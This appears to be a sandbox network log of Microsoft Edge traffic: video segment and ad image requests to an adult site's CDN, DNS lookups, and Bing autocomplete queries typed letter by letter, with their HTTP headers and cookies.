user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-headers: Server,Range,Content-Length,Content-Range
access-control-allow-methods: GET, HEAD, OPTIONS
access-control-allow-origin: https://www.pornhub.com
access-control-expose-headers: Server,Range,Content-Length,Content-Range
age: 1508217
cache-control: max-age=7776000, stale-while-revalidate=86400, stale-if-error=86400, immutable
content-type: video/MP2T
date: Sat, 05 Oct 2024 16:04:41 GMT
etag: "-1-f1b38"
last-modified: Wed, 18 Sep 2024 05:07:44 GMT
server: ECAcc (amb/6B54)
timing-allow-origin: *
x-cache: HIT
x-ec-bbr-enable: 1
content-length: 990008
GET

https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-5-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

msedge.exe

Remote address:

152.195.34.118:443

Request

GET /hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-5-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng HTTP/2.0
host: cv-h.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-headers: Server,Range,Content-Length,Content-Range
access-control-allow-methods: GET, HEAD, OPTIONS
access-control-allow-origin: https://www.pornhub.com
access-control-expose-headers: Server,Range,Content-Length,Content-Range
age: 1508219
cache-control: max-age=7776000, stale-while-revalidate=86400, stale-if-error=86400, immutable
content-type: video/MP2T
date: Sat, 05 Oct 2024 16:04:43 GMT
etag: "-1-1e1d78"
last-modified: Wed, 18 Sep 2024 05:07:45 GMT
server: ECAcc (amb/6B3D)
timing-allow-origin: *
x-cache: HIT
content-length: 1973624
GET

https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-6-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

msedge.exe

Remote address:

152.195.34.118:443

Request

GET /hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-6-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng HTTP/2.0
host: cv-h.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-headers: Server,Range,Content-Length,Content-Range
access-control-allow-methods: GET, HEAD, OPTIONS
access-control-allow-origin: https://www.pornhub.com
access-control-expose-headers: Server,Range,Content-Length,Content-Range
age: 1508218
cache-control: max-age=7776000, stale-while-revalidate=86400, stale-if-error=86400, immutable
content-type: video/MP2T
date: Sat, 05 Oct 2024 16:04:44 GMT
etag: "-1-151e78"
last-modified: Wed, 18 Sep 2024 05:07:46 GMT
server: ECAcc (amb/6B50)
timing-allow-origin: *
x-cache: HIT
content-length: 1384056
DNS

133.2.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.2.101.151.in-addr.arpa

IN PTR

Response
DNS

133.2.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.2.101.151.in-addr.arpa

IN PTR
DNS

229.193.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

229.193.101.151.in-addr.arpa

IN PTR

Response
DNS

118.34.195.152.in-addr.arpa

Remote address:

8.8.8.8:53

Request

118.34.195.152.in-addr.arpa

IN PTR

Response
GET

https://ei.phncdn.com/videos/202409/15/457809091/timeline/160x90/(m=eGCaiCObaaaa)(mh=_p3qeuCj3gZQt4s5)S6.jpg

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /videos/202409/15/457809091/timeline/160x90/(m=eGCaiCObaaaa)(mh=_p3qeuCj3gZQt4s5)S6.jpg HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.pornhub.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:43 GMT
content-type: image/jpeg
content-length: 139488
expires: Thu, 16 Jan 2025 16:02:24 GMT
cache-control: max-age=10406683
last-modified: Sun, 15 Sep 2024 15:51:23 GMT
etag: "27324-6222a6d9954c0"
access-control-allow-origin: *
timing-allow-origin: *
x-cdn-diag: lon1-16007-2-206703-h-0-0---;16032-914-559501----0-0-0
GET

https://ei.phncdn.com/www-static/images/htmlPauseRoll/pb_block_sprite.png?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/images/htmlPauseRoll/pb_block_sprite.png?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ei.phncdn.com/www-static/css/global-backgrounds.css?cache=2024100303
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:44 GMT
content-type: image/png
content-length: 1734
last-modified: Tue, 09 Jan 2024 19:46:04 GMT
etag: "659da27c-6c6"
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
timing-allow-origin: *
accept-ranges: bytes
x-cdn-diag: lon1-16032-3-282543-h-0-0---;16032-66-559501----0-0-0
DNS

pix-cdn77.trafficjunky.net

msedge.exe

Remote address:

8.8.8.8:53

Request

pix-cdn77.trafficjunky.net

IN A

Response

pix-cdn77.trafficjunky.net

IN CNAME

1564415456.rsc.cdn77.org

1564415456.rsc.cdn77.org

IN A

143.244.57.57
GET

https://pix-cdn77.trafficjunky.net/c3721/uploaded_content/creative/102/780/669/1/1027806691.gif/plain/q:85?secure=4PaMZPqyWU5_6hNVc9cUrw==,1728230683

msedge.exe

Remote address:

143.244.57.57:443

Request

GET /c3721/uploaded_content/creative/102/780/669/1/1027806691.gif/plain/q:85?secure=4PaMZPqyWU5_6hNVc9cUrw==,1728230683 HTTP/2.0
host: pix-cdn77.trafficjunky.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:45 GMT
content-type: image/webp
content-length: 29582
cache-control: max-age=31536000, public
content-disposition: inline; filename="1027806691.webp"
content-security-policy: script-src 'none'
vary: Accept, Sec-CH-DPR, DPR, Sec-CH-Width, Width
x-origin-content-length: 69379
x-origin-height: 750
x-origin-width: 300
x-request-id: 66F4740A-D812A85401BB390539-5BE44E
x-result-height: 750
x-result-width: 300
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
x-77-nzt: EggBj/Q5NwFBDAFPf9NFAfeO7wwA
x-77-nzt-ray: d78ac017785b24769d6301678f5d8e2c
x-accel-expires: @1758832527
x-accel-date: 1727296527
x-77-cache: HIT
x-77-age: 847758
server: CDN77-Turbo
x-cache: MISS
x-77-pop: parisFR
accept-ranges: bytes
DNS

57.57.244.143.in-addr.arpa

Remote address:

8.8.8.8:53

Request

57.57.244.143.in-addr.arpa

IN PTR

Response

57.57.244.143.in-addr.arpa

IN PTR

398494423parcdn77com
GET

https://www.bing.com/qbox?query=porn&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=fbe56689473b452ba630bdc5cb08b944&oit=1&cp=4&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=porn&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=fbe56689473b452ba630bdc5cb08b944&oit=1&cp=4&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
GET

https://www.bing.com/qbox?query=porn+&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=23b69a0dab1f4e45bf19276e019c1174&oit=1&cp=5&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=porn+&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=23b69a0dab1f4e45bf19276e019c1174&oit=1&cp=5&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 328
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163bf4adb4358a20e703f2ced9b19
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-jKCsgiGoI2OZp8dA0QfnCQZrgnlUB/1xbGIHrDZIfz0='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:20 GMT
Connection: keep-alive
Set-Cookie: MUID=38B55453CF5264AA2BE2415CCEB56590; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:20 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=38B55453CF5264AA2BE2415CCEB56590; expires=Thu, 30-Oct-2025 16:05:20 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=3F90E6B386806B9209E3F3BC87676AB3; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:20 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:20 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:20 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=F9530185C69F45DDA9A3C10DD700AF90&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:20 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:20 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:20 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=3F90E6B386806B9209E3F3BC87676AB3; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.ac777b5c.1728144319.695e25a
GET

https://www.bing.com/qbox?query=porn+v&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=b9aaf558adf74cb2b5183259e6863d31&oit=4&cp=6&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=porn+v&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=b9aaf558adf74cb2b5183259e6863d31&oit=4&cp=6&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 135
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163c10c8e48b39de80a2fa0912468
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-0on0Em+XfBvlBJeVDVkHfezAYV7ihu+DRSJXDyNT5kE='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:21 GMT
Connection: keep-alive
Set-Cookie: MUID=159E3DCF47E66CC734BC28C046406DE9; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=159E3DCF47E66CC734BC28C046406DE9; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=3B8527A51D66689D100D32AA1CC0690E; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=FACD74C3091641CEBE608E8C2B2E9F85&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=3B8527A51D66689D100D32AA1CC0690E; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.ac777b5c.1728144321.695e3b0
GET

https://www.bing.com/qbox?query=porn+vi&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=f76df93fe8764ce490a79706cc83befe&oit=4&cp=7&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=porn+vi&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=f76df93fe8764ce490a79706cc83befe&oit=4&cp=7&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 136
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163c1a1a64b379a91e7e9cc799b46
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-R0GAMQoSt+irBvo6W4Vk1pkxl0h0uaJmgP5W+va++w8='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:21 GMT
Connection: keep-alive
Set-Cookie: MUID=20109ACEBE576FFF0E6A8FC1BF476E06; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=20109ACEBE576FFF0E6A8FC1BF476E06; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=102C0F44DC5565832EB01A4BDD45643B; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=813C205D269243F1B7218F6EE3D1A2F4&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:21 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=102C0F44DC5565832EB01A4BDD45643B; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.ac777b5c.1728144321.695ecdb
GET

https://www.bing.com/qbox?query=porn+vir&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=c5f33866e3944d35a5b82e4ebb885c67&oit=4&cp=8&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=porn+vir&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=c5f33866e3944d35a5b82e4ebb885c67&oit=4&cp=8&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 137
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163c2a2794a8ca03e2348f01a2fd4
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-18MpJ8D7rfn8fEVFITNAFpQU1yIbHEsSbm8L4fbtysQ='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:22 GMT
Connection: keep-alive
Set-Cookie: MUID=310AB59AA0BC67C10EE6A095A1EF6673; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=310AB59AA0BC67C10EE6A095A1EF6673; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=302EBAC556E76CCD33F1AFCA57B46D63; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=0F1B6276267A482795644BE7E1BCEC99&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=302EBAC556E76CCD33F1AFCA57B46D63; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.ac777b5c.1728144322.695ef67
GET

https://www.bing.com/qbox?query=porn+viru&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=a579bce550404ab0bd16976d2ffc87f8&oit=4&cp=9&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=porn+viru&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=a579bce550404ab0bd16976d2ffc87f8&oit=4&cp=9&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 138
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163c2afec47869e0b6e87d3c3c7dd
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-wD3N0syT0mfgoJB8sB6qCcpK7QH+s/xCGnvCevZ/NIg='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:22 GMT
Connection: keep-alive
Set-Cookie: MUID=1248949E83F160882AEF81918238613E; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=1248949E83F160882AEF81918238613E; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=03530C3245C362FF1C1B193D440A63AC; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; HttpOnly
